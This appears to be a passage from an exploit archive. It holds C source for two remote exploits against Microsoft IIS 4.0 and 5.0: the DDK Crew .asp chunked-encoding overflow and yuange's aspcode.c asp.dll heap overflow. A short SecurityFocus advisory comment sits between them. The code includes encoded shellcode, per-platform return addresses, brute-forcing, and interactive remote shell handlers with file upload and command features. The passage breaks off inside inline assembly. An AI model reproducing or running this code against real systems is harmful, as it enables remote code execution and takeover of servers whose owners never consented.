"\x30\x6f\x26\x5d\x55\x55\x21\x27\xbe\x5d\x55\x55\x23\x27\x3a\x5d" "\x55\x55\x21\x5e\x27\x30\x7f\xb6\x5d\x55\x55\xf8\x27\x30\x6f\xfa" "\x5d\x55\x55\xfa\xc0\xaa\xc0\xaa\xc0\xaa\xc0\xab\xc0\xaa\xc0\xaa" "\x21\x27\x30\x42\x5d\x55\x55\xfb\xc0\xaa\x55\x30\x7f\x16\x5d\x55" "\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\x21" "\x5e\xc0\xaa\xc0\xaa\x27\x30\x7f\x9a\x5d\x55\x55\xf8\xc2\xaa\xae" "\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xb2\x5d\x55\x55" "\xfb\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x30" "\x50\xab\xaa\xaa\xaa\x30\x6f\x78\xa5\x30\x6e\xdf\xab\xaa\xaa\x21" "\x5e\xc0\xaa\xc0\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\xc2\xaa\xae" "\xaa\xaa\x27\x27\xaa\x52\x55\x55\xfb\x21\x30\x7f\xb2\x5d\x55\x55" "\xf8\x55\x30\x7f\x6e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29" "\x17\x9a\x5d\x55\x55\xaa\xa5\x24\x30\x6e\xaa\xaa\xaa\x21\x5e\xc0" "\xaa\x27\x30\x6f\x9a\x5d\x55\x55\xfa\x21\x27\x9a\x5d\x55\x55\xfb" "\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xb2\x5d\x55\x55\xfa" "\x55\x30\x7f\x62\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x29\x17" "\x9a\x5d\x55\x55\xaa\xd4\x82\x21\x5e\xc0\xaa\x21\x27\x9a\x5d\x55" "\x55\xfb\x27\x30\x7f\xaa\x52\x55\x55\xf8\x21\x30\x6f\xe2\x5d\x55" "\x55\xfa\x55\x30\x7f\x4e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1" "\x41\x8b\x21\x5e\xc0\xaa\xc0\xa2\x21\x27\x30\x42\x5d\x55\x55\xfb" "\x21\x30\x7f\xe2\x5d\x55\x55\xf8\x55\x30\x7f\x4e\x5d\x55\x55\x91" "\x5e\x3a\xe9\xe1\xe9\xe1\x43\x18\xaa\xaa\xaa\x21\x5e\xc0\xaa\xc2" "\xaa\xae\xaa\xaa\x27\x30\x6f\xaa\x52\x55\x55\xfa\x21\x27\xe2\x5d" "\x55\x55\xfb\x55\x30\x7f\x42\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" "\xe1\x23\x30\x6f\x9a\x5d\x55\x55\x29\x17\x9a\x5d\x55\x55\xaa\xd5" "\xf8\x6d\x30\x6f\x9a\x5d\x55\x55\xac\xaa\xaa\xaa\x21\x5e\xc0\xaa" "\x27\x30\x7f\x9a\x5d\x55\x55\xf8\x21\x30\x6f\x9a\x5d\x55\x55\xfa" "\x21\x27\x30\x42\x5d\x55\x55\x29\x6b\xa2\xfb\x21\x30\x7f\xa6\x5d" "\x55\x55\xf8\x55\x30\x7f\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9" "\xe1\x21\x5e\x21\x30\x6f\xe2\x5d\x55\x55\xfa\x55\x30\x7f\x5a\x5d" "\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x41\x98\x21\x5e\xc0\xaa\x27" "\x27\x9a\x5d\x55\x55\xfb\x21\x30\x7f\x9a\x5d\x55\x55\xf8\x27\x30" "\x6f\xaa\x52\x55\x55\xfa\x21\x27\xa6\x5d\x55\x55\xfb\x55\x30\x7f" "\x66\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x43\xd4\x54\x55\x55" "\x43\x87\x57\x55\x55\x41\x54\xf2\xfa\x21\x17\x30\x42\x5d\x55\x55" "\x23\xed\x58\x69\x21\xee\x8e\xa6\xaf\x12\xaa\xaa\xaa\x6d\xaa\xee" "\x99\x88\xbb\x99\x6a\x69\x41\x46\x42\xb3\x53\x55\x55\xb4\xc6\xe6" "\xc5\xcb\xce\xe6\xc3\xc8\xd8\xcb\xd8\xd3\xeb\xaa\xe9\xd8\xcf\xcb" "\xde\xcf\xfa\xc3\xda\xcf\xaa\xe9\xd8\xcf\xcb\xde\xcf\xfa\xd8\xc5" "\xc9\xcf\xd9\xd9\xeb\xaa\xe9\xc6\xc5\xd9\xcf\xe2\xcb\xc4\xce\xc6" "\xcf\xaa\xfa\xcf\xcf\xc1\xe4\xcb\xc7\xcf\xce\xfa\xc3\xda\xcf\xaa" "\xf8\xcf\xcb\xce\xec\xc3\xc6\xcf\xaa\xfd\xd8\xc3\xde\xcf\xec\xc3" "\xc6\xcf\xaa\xdd\xd9\xc5\xc9\xc1\x99\x98\x84\xce\xc6\xc6\xaa\xd9" "\xc5\xc9\xc1\xcf\xde\xaa\xc8\xc3\xc4\xce\xaa\xc6\xc3\xd9\xde\xcf" "\xc4\xaa\xcb\xc9\xc9\xcf\xda\xde\xaa\xd9\xcf\xc4\xce\xaa\xd8\xcf" "\xc9\xdc\xaa\xc3\xc5\xc9\xde\xc6\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9" "\xc6\xc5\xd9\xcf\xd9\xc5\xc9\xc1\xcf\xde\xaa\xc9\xc7\xce\x84\xcf" "\xd2\xcf\xaa\xcf\xd2\xc3\xde\xa7\xa0\xaa"; struct{ int def; char *descr; unsigned int ret; unsigned int rewrite; int port; char path[256]; }target[] = { {0, " IIS5 Windows 2000 by hsj", 0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"}, {1, " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"}, {2, " IIS5 Windows 2000 Chinese SP2", 0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"}, {3, " IIS5 Windows 2000 English SP2", 0x0045C560, 0x77edf44c, 80, "/iisstart.asp"}, {4, " IIS4 Windows NT4", 0, 0, 80, "/iisstart.asp"}, {666, NULL, 0, 0, 0, NULL} }; int sel = 0; int resolve (char *IP); int make_connection(char *address,int port); int open_back(char *host,int port); void l33thax0r(int sock); void usage(char *name); int main(int argc, char **argv) { int i, j, cnt, sock; int brute = 0; unsigned int step; unsigned char *shell_port_offset; char buf[8192], buf2[16384], host[1024]; unsigned int ret_start, ret_stop, ret_step, ret_1; fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit " "- DDK Crew 2k2 - (version "VERSION")\n" " by NeMeS||y and Birdack\n\n"); if(argc == 1) usage(argv[0]); while((cnt = getopt(argc,argv,"h:t:p:f:b:")) != EOF) { switch(cnt) { case 'h': strncpy(host, optarg, sizeof(host)); host[sizeof(host) - 1] = '\x00'; break; case 't': sel = atoi(optarg); break; case 'p': sscanf(optarg, "%p", &target[sel].port); break; case 'f': strncpy(target[sel].path, optarg, sizeof(&target[sel].path)); target[sel].path[sizeof(&target[sel].path) -1] = '\x00'; break; case 'b': brute = 1; step = atoi(optarg); break; default: usage(argv[0]); break; } } if(target[sel].def == 4) brute = 1; // ;> sock = make_connection(host,target[sel].port); if(sock<0) { printf("Error -> [ %d ] not connected.\n\n",sock); return -3; } if(brute==0) { ret_start = target[sel].ret; ret_step = 1; ret_stop = target[sel].ret; } else { ret_start = RET_BRUTE_START; ret_step = step; ret_stop = RET_BRUTE_STOP; } printf("\n [+] Start\n\n host\t->\t%s\n port\t->\t%d\n path\t->\t%s\n type\t->\t%s\n\n\n", host, target[sel].port, target[sel].path, target[sel].descr); if(brute==1) printf("\n [+] Brute forcing enabled... do u have time?\n\n"); for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step) { for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;) { buf[i++] = 0xeb; buf[i++] = 0x06; } *(unsigned int *)&buf[i] = 0x41414141; *(unsigned int *)&buf[i+4] = 0x41414141; *(unsigned int *)&buf[i+8] = 0x41414141; memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode)); buf[sizeof(buf)-1] = 0; sprintf(buf2,"POST %s?%s HTTP/1.0\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Transfer-Encoding: chunked\r\n\r\n" "10\r\nDDKDDKDDKDDKDD\r\n" "4\r\nRETT\r\n" "4\r\nREWR\r\n" "0\r\n\r\n\r\n", &target[sel].path,buf); *(unsigned int *)strstr(buf2,"REWR") = &target[sel].rewrite; *(unsigned int *)strstr(buf2,"RETT") = ret_1; if(brute==0) printf(" # Sending buffer to socket : "); write(sock,buf2,strlen(buf2)); fprintf(stderr, " [+] ret : 0x%08lx ->",ret_1); sleep(3); if(brute==0) printf("DONE!\n\n"); shutdown(sock,2); close(sock); printf(" # connecting to our shell - port : [ %d ]\n",PORT_BIND); sock=open_back(host,PORT_BIND); if(sock==-1 && brute==0) { printf("\n [-] FAILED "); printf("exiting now!\n\n"); exit(-1); } if(sock!=-1) { printf("\n\n[+] Address guessed!! \n\n"); printf("...OH oH OH... done! our evilcode has worked baby at [ %d ]\n", ret_1); l33thax0r(sock); exit(0); } } } int resolve (char *IP) { struct hostent *info; unsigned long ip; if ((ip=inet_addr(IP))==-1) { if ((info=gethostbyname(IP))==0) { printf("Couldnt resolve [%s]\n", IP); exit(0); } memcpy(&ip, (info->h_addr), 4); } return (ip); } int make_connection(char *address,int port) { struct sockaddr_in server,target; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&server,0,sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = 0; target.sin_family = AF_INET; target.sin_addr.s_addr = resolve(address); if(target.sin_addr.s_addr==0) { close(s); return -2; } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = 10; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -3; } if(i==0) { close(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); errno = bf; return -5; } ioctl(s,FIONBIO,&bf); return s; } int open_back(char *host,int port) { int sock, err; struct sockaddr_in server_addr; struct hostent *he; he=gethostbyname(host); if (he == NULL) return -1; server_addr.sin_family = AF_INET; server_addr.sin_port = htons (port); server_addr.sin_addr.s_addr = resolve(host); sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) return -1; err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr)); if (err == -1) sock = -1; return sock; } void l33thax0r(int sock) { char buf[1024]; fd_set rset; int i; while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(sock,&rset)) { i=read(sock,buf,1024); if (i <= 0) { printf("Fuck... the connection was closed!\n"); printf("exiting...\n\n"); exit(0); } buf[i]=0; puts(buf); } if (FD_ISSET(STDIN_FILENO,&rset)) { i=read(STDIN_FILENO,buf,1024); if (i>0) { buf[i]=0; write(sock,buf,i); } } } } void usage(char *name) { int j = 0; printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name); printf("\nOptions:\n" " -h hostname (www.iisvictim.com)\n" " -t target\n" " -p port (default 80)\n" " -f path_file (default /iisstart.asp)\n" " -b step (brute force, try step 2000)\n\n" "Available targets:\n\n"); while(target[j].def != 666) { printf(" %d ] - %s -\n", target[j].def, target[j].descr); j++; } printf("\n"); exit(1); }

/* source: https://www.securityfocus.com/bid/4485/info A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable. A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves. */ /* aspcode.c ver1.0 iis4.0��iis5.0��iis5.1 asp.dll overflow program copy by yuange <[email protected]> 2002.4.24 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #include <httpext.h> #pragma comment(lib,"ws2_32") //#define RETEIPADDR eipwin2000 #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x50 #define BUFFSIZE 0x20000 #define PATHLONG 0x12 #define RETEIPADDRESS 0x468 #define SHELLBUFFSIZE 0x800 #define SHELLFNNUMS 14 #define DATABASE 0x61 #define DATAXORCODE 0x55 #define LOCKBIGNUM 19999999 #define LOCKBIGNUM2 13579139 #define MCBSIZE 0x8 #define MEMSIZE 0xb200 #define SHELLPORT 0x1f90 //0x1f90=8080 #define WEBPORT 80 void shellcodefnlock(); void shellcodefnlock2(); void shellcodefn(char *ecb); void shellcodefn2(char *ecb); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); void iisput(int fd,char *str); void iisget(int fd,char *str); void iiscmd(int fd,char *str); void iisreset(); void iisdie(); void iishelp(); int newrecv(int fd,char *buff,int size,int flag); int newsend(int fd,char *buff,int size,int flag); int xordatabegin; int lockintvar1,lockintvar2; char lockcharvar; int main(int argc, char **argv) { char *server; char *str="LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "CreateFileA""\x0" "GetFileSize""\x0" "GetLastError""\x0" "Sleep""\x0" "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0" "\x09""asp.dll""\x0""HttpExtensionProc""\x0" "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0" "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0" "XORDATA""\x0""xordatareset""\x0" "strend"; // char buff0[]="TRACK / HTTP/1.1\nHOST:"; char buff1[]="GET /"; char buff2[]="default.asp"; char *buff2add; char buff3[]="?!!ko "; char buff4[]=" HTTP/1.1 \nHOST:"; char buff5[]="\nContent-Type: application/x-www-form-urlencoded"; char buff51[]="\nTransfer-Encoding:chunked"; char buff6[]="\nContent-length: 2147506431\r\n\r\n"; // 0x80000000+MEMSIZE-1 char buff61[]="\nContent-length: 4294967295\r\n\r\n"; // 0xffffffff char buff7[]= "\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01"; char buff11[]= "\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01"; char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01"; char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"; char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90"; /* char buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01"; char buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01"; char buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01"; char buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01"; char buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01"; char buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01"; */ char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char SRLF[]="\x0d\x0a\x00\x00"; char *eipexceptwin2000add; char eipexceptwin20002[]="\x80\x70\x9f\x74"; // push ebx ; ret address char eipexceptwin2000cn[]="\x73\x67\xfa\x7F"; // push ebx ; ret address char eipexceptwin2000[]="\x80\x70\x97\x74"; // char eipexceptwin2000[]="\xb3\x9d\xfa\x77"; // \x01\x78"; // call ebx address char eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78"; char eipexceptwin2000sp2[]="\x02\xbc\x01\x78"; // char eipexceptwin2000[]="\x0B\x08\x5A\x68"; // char eipexceptwin2000[]="\x32\x8d\x9f\x74"; char eipexceptwinnt[] ="\x82\x01\xfc\x7F"; // push esi ; ret address // char eipexceptwinnt[] ="\x2e\x01\x01\x78"; // call esi address // char eipexcept2[]="\xd0\xae\xdc\x77"; // char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[BUFFSIZE]; char shellcodebuff2[BUFFSIZE]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong,buff2long,shelladd,packlong; int i,j,k,l,strheadlong; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int result; fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 ."); fprintf(stderr,"\n copy by yuange 2002.4.24."); fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net ."); fprintf(stderr,"\n welcome to http://www.nsfocus.com ."); fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n", argv[0]); buff2add=buff2; if(argc <2){ fprintf(stderr,"\n please enter the web server:"); gets(recvbuff); for(i=0;i<strlen(recvbuff);++i){ if(recvbuff[i]!=' ') break; } server=recvbuff; if(i<strlen(recvbuff)) server+=i; fprintf(stderr,"\n please enter the .asp filename:"); gets(shellcodebuff); for(i=0;i<strlen(shellcodebuff);++i){ if(shellcodebuff[i]!=' ') break; } buff2add=shellcodebuff+i; printf("\n .asp file name:%s\n",buff2add); } eipexceptwin2000add=eipexceptwin2000; // printf("\n argc%d argv%s",argc,argv[5]); if(argc>5){ if(strcmp(argv[5],"cn")==0) { eipexceptwin2000add=eipexceptwin2000cn; printf("\n For the cn system.\n"); } if(strcmp(argv[5],"sp0")==0) { eipexceptwin2000add=eipexceptwin20002; printf("\n For the sp0 system.\n"); } if(strcmp(argv[5],"msvcrt")==0) { eipexceptwin2000add=eipexceptwin2000msvcrt; printf("\n Use msvcrt.dll JMP to shell.\n"); } if(strcmp(argv[5],"sp2")==0) { eipexceptwin2000add=eipexceptwin2000sp2; printf("\n Use sp2 msvcrt.dll JMP to shell.\n"); } } result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } /* if(argc>4){ offset=atoi(argv[4]); } // OVERADD+=offset; // packlong=0x10000-offset+0x8; if(offset<-0x20||offset>0x20){ fprintf(stderr,"\n offset error !offset -32 --- +32 ."); gets(buff); exit(1); } */ if(argc <2){ // WSACleanup( ); // exit(1); } else server = argv[1]; for(i=0;i<strlen(server);++i){ if(server[i]!=' ') break; } if(i<strlen(server)) server+=i; for(i=0;i+3<strlen(server);++i){ if(server[i]==':'){ if(server[i+1]=='\\'||server[i+1]=='/'){ if(server[i+2]=='\\'||server[i+2]=='/'){ server+=i; server+=3; break; } } } } for(i=1;i<=strlen(server);++i){ if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0; } d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); gets(buff); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(port==0) port=WEBPORT; fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) { closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); gets(buff); exit(1); } _asm{ mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } /* shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } */ memset(buff,NOPCODE,BUFFSIZE); /* strcpy(buff,buff0); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n"); strcat(buff,buff1); */ strcpy(buff,buff1); strheadlong=strlen(buff); OVERADD+=strheadlong-1; if(argc>2) buff2add=argv[2]; for(;;++buff2add){ temp=*buff2add; if(temp!='\\'&&temp!='/') break; } // printf("\nfile:%s",buff2add); buff2long=strlen(buff2add); strcat(buff,buff2add); // fprintf(stderr,"\n offset:%d\n",offset); // offset+=strheadlong-strlen(buff1); /* for(i=0x404;i<=0x500;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwin2000add,4); } if(argc>5){ if(strcmp(argv[5],"sp2")==0) { memcpy(buff+offset+i,"\x58",1); } } for(i=0x220;i<=0x380;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } for(i=0x580;i<=0x728;i+=8){ memcpy(buff+offset+i,"\x42\x42\x42\x2d",4); // 0x2d sub eax,num32 memcpy(buff+offset+i+4,eipexceptwinnt,4); } */ // winnt 0x2cc or 0x71c win2000 0x130 or 0x468 // memcpy(buff+offset+i+8,exceptret,strlen(exceptret)); shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(shellcodebuff2,NOPCODE,BUFFSIZE); i=0x1000; memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=BUFFSIZE;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } // k+=0x memcpy(shellcodebuff,shellcodefnadd,k); //j); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for(j=0;j<0x400;++j){ if(memcmp(str+j,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,j); sendpacketlong=k+j; for(k=0;k<=0x200;++k){ if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break; } for(j=0;j<sendpacketlong;++j){ temp=shellcodebuff[j]; // temp^=DATAXORCODE; shellcodebuff2[i+4+k]=DATABASE+temp/0x10; ++k; shellcodebuff2[i+4+k]=DATABASE+temp%0x10; ++k; } j=i+k; j=j%8+3; shellcodebuff2[i+j+k]=0; // j=strlen(shellcodebuff2)%8+3; for(j=0;j<=0xe000;j+=4){ strcat(shellcodebuff2,"\x41\x41\x41\x41"); // 0x2d sub eax,num32 // strcat(shellcodebuff2,eipexceptwin2000cn); } /* strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\ x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\ x90"); for(j=0;j<=0xb00;j+=4){ strcat(shellcodebuff2,"\x90\x90\x90\x2d"); // 0x2d sub eax,num32 } */ // printf("\nbuff:%s",buff); printf("\n shellcode long 0x%x\n",sendpacketlong); if(argc>4&&strcmp(argv[4],"apache")==0){ strcat(buff," "); } else strcat(buff,buff3); printf("\n packetlong:0x%x\n",sendpacketlong); strcat(buff,buff4); if(argc>6) strcat(buff,argv[6]); else strcat(buff,server); strcat(buff,buff5); if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," "); else strcat(buff,shellcodebuff2); // strcat(buff,buff51); if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) { printf("\n for %s system\n",argv[4]); strcat(buff,buff61); } else strcat(buff,buff6); // printf("\n send buff:\n%s",buff); /* i=strlen(buff); memset(buff+i,'a',0xc000); memset(buff+i+0xc000-strlen(buff7),0,1); strcat(buff+i+0xc000-0x10-strlen(buff7),buff7); */ // strcpy(buff8,buff7); /* temp=buff7[5]; temp-=offset*0x10; buff7[5]=temp; i=*(int *)(buff7+4)+2; printf("\nSEH=0x%x\n",i); */ /* for(i=0;i<8;++i){ temp=buff7[i]; printf("%2x",temp); } */ /* for(i=0;i<0xc000/0x10;++i){ strcat(buff,buff7); } */ // printf("\nbuff=%s\n",buff); // strcat(buff,"\r\n"); // printf("\n send buff:\n%s",buff); // strcpy(buff+OVERADD+NOPLONG,shellcode); sendpacketlong=strlen(buff); // printf("buff:\n%s",buff+0x10000); /* #ifdef DEBUG _asm{ lea esp,buff add esp,OVERADD ret } #endif */ lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; xordatabegin=0; for(i=0;i<1;++i){ j=sendpacketlong; // buff[0x2000]=0; fprintf(stderr,"\n send packet %d bytes.",j); // gets(buff); send(fd,buff,j,0); buff7[0]=MCBSIZE; j=MEMSIZE+0x10; i=0; if(argc>4&&strcmp(argv[4],"winxp")==0) { j=0x18; i=8; } for(k=0;i<0xc000;i+=0x10){ if(i>=j) { k=((i-j)/(MCBSIZE*8)); if(k<=6){ memcpy(buff7+0x8,buff10,8); buff7[0x8]=buff8[k]; buff7[0xc]=buff9[k]; } else memcpy(buff7,buff11,0x10); } memcpy(buff+i,buff7,0x10); } if(argc>4&&strcmp(argv[4],"apache")==0){ for(k=0xb000;k<=0xc000;k+=2) { memset(buff+k,0x0d,1); memset(buff+k+1,0x0a,1); } buff[0xc000]=0; // for(k=0;k<0x10;++k) send(fd,buff,0xc000,0); // printf("\nbuff:%s\n",buff); } else send(fd,buff,0xc000,0); k=0; ioctlsocket(fd, FIONBIO, &k); j=0; while(j==0){ k=newrecv(fd,recvbuff,BUFFSIZE,0); if(k>=8&&strstr(recvbuff,"XORDATA")!=0) { xordatabegin=1; fprintf(stderr,"\n ok!recv %d bytes\n",k); recvbuff[k]=0; // printf("\n recv:%s",recvbuff); // for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int *)(recvbuff+8+4*j)); k=-1; j=1; } if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } } k=1; ioctlsocket(fd, FIONBIO, &k); // fprintf(stderr,"\n now begin: \n"); /* for(i=0;i<strlen(SRLF);++i){ SRLF[i]^=DATAXORCODE; } send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); send(fd,SRLF,strlen(SRLF),0); */ k=1; l=0; while(k!=0){ if(k<0){ l=0; i=0; while(i==0){ gets(buff); if(memcmp(buff,"iish",4)==0){ iishelp(); i=2; } if(memcmp(buff,"iisput",6)==0){ iisput(fd,buff+6); i=2; } if(memcmp(buff,"iisget",6)==0){ iisget(fd,buff+6); i=2; } if(memcmp(buff,"iiscmd",6)==0){ iiscmd(fd,buff+6); i=2; } if(memcmp(buff,"iisreset",8)==0){ iisreset(fd,buff+6); i=2; } if(memcmp(buff,"iisdie",6)==0){ iisdie(fd,buff+6); i=2; } if(i==2)i=0; else i=1; } k=strlen(buff); memcpy(buff+k,SRLF,3); // send(fd,SRLF,strlen(SRLF),0); // fprintf(stderr,"%s",buff); /* for(i=0;i<k+2;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } send(fd,buff,k+2,0); */ newsend(fd,buff,k+2,0); // send(fd,SRLF,strlen(SRLF),0); } k=newrecv(fd,buff,BUFFSIZE,0); if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) { xordatabegin=1; k=-1; } if(k>0){ // fprintf(stderr,"recv %d bytes",k); /* if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } */ l=0; buff[k]=0; fprintf(stderr,"%s",buff); } else{ Sleep(20); if(l<20) k=1; ++l; } // if(k==0) break; } closesocket(fd); WSACleanup( ); fprintf(stderr,"\n the server close connect."); gets(buff); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop jmp next1 getediadd: pop edi mov esp,edi and esp,0xfffff0f0 jmp next2 getshelladd: push 0x01 mov eax,edi inc eax inc eax inc eax inc eax inc eax mov edi,eax mov esi,edi // sub sp,8 xor ecx,ecx looplock: lodsb cmp al,cl jz shell sub al,DATABASE mov ah,al lodsb sub al,DATABASE shl ah,4 add 